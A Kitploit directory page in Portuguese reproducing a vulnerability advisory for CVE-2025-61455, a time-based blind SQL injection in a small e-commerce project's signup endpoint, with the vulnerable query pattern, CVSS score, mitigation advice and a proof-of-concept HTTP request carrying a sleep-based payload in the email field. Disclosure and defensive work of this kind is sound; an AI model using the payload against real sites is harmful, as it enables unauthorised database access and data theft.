Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-61455 — Divulgação pública e prova de conceito para CVE-2025-61455, uma injeção SQL crítica no E-commerce Project v1.0, incluindo detalhes técnicos, PoC e recomendações de mitigação. | Kitploit
Ferramentas/GitHubGitHub/tansique-17/cve-2025-61455
Análise de VulnerabilidadesExploraçãoSegurança WebAprendizado e EducaçãoRecursos Curados
GitHubtansique-17/cve-2025-61455

CVE-2025-61455

Divulgação pública e prova de conceito para CVE-2025-61455, uma injeção SQL crítica no E-commerce Project v1.0, incluindo detalhes técnicos, PoC e recomendações de mitigação.

Ver Repositório
há 10 mesesAinda não revisado
Site

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🛡️ Divulgação de CVE: CVE-2025-61455 — Injeção de SQL em Projeto de E-commerce

Data de Divulgação: 14 de outubro de 2025
ID do CVE: CVE-2025-61455
Gravidade: CRÍTICA (CVSS 9.8)


🧩 Resumo

Existe uma vulnerabilidade crítica de Injeção de SQL no E-commerce Project v1.0, especificamente no endpoint signup.inc.php. A aplicação incorpora diretamente entradas de usuário não sanitizadas em consultas SQL, permitindo que atacantes não autenticados contornem a autenticação e executem comandos SQL arbitrários.

Este problema recebeu o identificador CVE-2025-61455. No momento da divulgação pública, nenhuma correção oficial estava disponível.


📦 Produto Afetado

  • Fornecedor: Independente (Bhabishya-123)
  • Projeto: E-commerce
  • Versão: v1.0
  • Arquivo: signup.inc.php
  • Endpoint Vulnerável:
    https://localhost/e-commerce-main/includes/signup.inc.php

  • 🔬 Detalhes da Vulnerabilidade

    A aplicação usa entrada não sanitizada diretamente em consultas SQL, sem qualquer validação de entrada ou declarações preparadas. A vulnerabilidade existe no parâmetro aid do arquivo signup.inc.php.

    Um atacante pode injetar código SQL malicioso através do parâmetro de e-mail, permitindo ataques de injeção de SQL cega baseada em tempo.

    Exemplo de padrão de código vulnerável:

    root@kitploit:~
    $query = "SELECT * FROM table WHERE email='$email'";
    

    Isso permite payloads de injeção que podem manipular a lógica da consulta e extrair dados sensíveis.


    📌 Classificação CWE

    ID CWETítulo
    CWE-89Neutralização Incorreta de Elementos Especiais usados em um Comando SQL

    📊 Pontuação CVSS v3.1

    PontuaçãoGravidadeString do Vetor
    9.8CRÍTICACVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

    💥 Impacto

    Uma exploração bem-sucedida pode resultar em:

    • ✅ Contorno de autenticação completo
    • 🔓 Acesso não autorizado a recursos privilegiados
    • 📊 Exfiltração de dados através de injeção de SQL cega baseada em tempo
    • 🛠️ Potencial manipulação ou exclusão de dados
    • ⚠️ Comprometimento total do banco de dados backend
    • 💻 Potencial para execução remota de código

    🧪 Prova de Conceito (PoC)

    1. Clonar o Repositório

    root@kitploit:~
    git clone https://github.com/Bhabishya-123/E-commerce.git
    

    2. Hospedar Localmente

    Use XAMPP/LAMP para implantar o projeto e navegue até:

    root@kitploit:~
    http://localhost/e-commerce-main/includes/signup.inc.php
    

    3. Injeção de Payload

    Envie a seguinte solicitação HTTP maliciosa:

    root@kitploit:~
    POST /e-commerce-main/includes/signup.inc.php HTTP/1.1
    Host: localhost
    Content-Type: application/x-www-form-urlencoded
    
    name=DvYLInUG&[email protected]'%2b(select*from(select(sleep(20)))a)%2b'&address=BWhKCxUw&number=666897&pwd=n7N%21j3r%21T7&rpwd=k0U%21t0f%21E9&submit=
    

    Explicação:
    O parâmetro de e-mail contém um payload de injeção de SQL baseada em tempo: '+(select*from(select(sleep(20)))a)+'

    Se a aplicação atrasar a resposta em 20 segundos, a injeção de SQL foi bem-sucedida.


    🔐 Recomendações

    • ✅ Substitua consultas SQL dinâmicas por declarações preparadas (mysqli_prepare() ou PDO).
    • 🔍 Realize validação e sanitização de entrada para todas as entradas de usuário.
    • 🧱 Implante um Firewall de Aplicação Web (WAF) para bloquear padrões conhecidos de injeção de SQL.
    • 🛡️ Conduza auditorias de código regulares e testes de penetração para detecção precoce.
    • 🔒 Implemente consultas parametrizadas para todas as interações com o banco de dados.
    • 📝 Use listas de permissões para validação de entrada sempre que possível.

    📆 Cronograma

    EventoData
    Vulnerabilidade Descoberta16 de setembro de 2025
    Divulgação Pública13 de outubro de 2025
    Correção Disponível❌ Não disponível na data da divulgação

    🙋‍♂️ Créditos

    Esta vulnerabilidade foi descoberta e divulgada de forma responsável por:

    Tansique Dasari
    🔗 GitHub
    ✉️ [email protected]


    🔗 Referências

    • OWASP - Injeção de SQL
    • PortSwigger - Injeção de SQL
    • CVE-2025-61455 no CVE.org

    💬 Este aviso é publicado de forma independente devido à falta de resposta do fornecedor.

    Baixar ferramenta